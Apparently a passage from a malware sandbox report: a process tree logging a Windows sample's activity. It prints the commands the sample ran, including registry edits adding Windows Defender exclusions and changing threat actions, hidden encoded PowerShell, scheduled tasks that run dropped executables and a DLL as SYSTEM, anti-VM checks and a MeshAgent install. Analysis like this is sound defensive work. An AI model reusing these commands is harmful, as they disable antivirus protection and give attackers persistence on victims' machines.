                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5892
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5792
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:6124
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4392
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:2428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5908
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5148
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PdOICyyFbClqQxVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\PdOICyyFbClqQxVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5884
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5820
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5324
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1924
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HIoTiJfsoGzpkHVf /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2516
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HIoTiJfsoGzpkHVf /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              PID:5292
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "gMphIFVud" /SC once /ST 12:39:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1004
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /run /I /tn "gMphIFVud"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              PID:6072
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:812
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /DELETE /F /TN "gMphIFVud"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:6444
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 17:41:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\yYpgIeX.exe\" 9Z /bFMddidKq 385121 /S" /V1 /F
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                  PID:6476
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5692
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 832
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:6588
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5908
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  PID:5932
                                                                                                                                                                                                                                • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                  C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:2088
                                                                                                                                                                                                                                • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                  PID:5824
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5128
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                        wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:3744
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6096
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5828
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                            wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5332
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6128
                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5892
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:4976
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -noprofile -nologo -command -
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                    PID:5760
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2608
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -noprofile -nologo -command -
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:6104
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -noprofile -nologo -command -
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:5880
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -noprofile -nologo -command -
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                      PID:7092
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    PID:6028
                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4408
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5872
                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:2996
                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6124
                                                                                                                                                                                                                                                          • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5540
                                                                                                                                                                                                                                                            • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\yYpgIeX.exe
                                                                                                                                                                                                                                                              C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\yYpgIeX.exe 9Z /bFMddidKq 385121 /S
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                              PID:6580
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:6676
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                    PID:6692
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:6712
                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:6720
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:6740
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:6748
                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:6768
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                            PID:6800
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:6824
                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:6816
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                PID:2276
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:6856
                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:6876
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                          PID:4408
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:7016
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:4508
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:6392
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                            PID:6440
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                              PID:6464
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:6516
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:6788
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\jJVxHA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                            PID:6700
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\WyiEidy.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                            PID:6764
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                            schtasks /END /TN "MHiaqjbnoCNpItK"
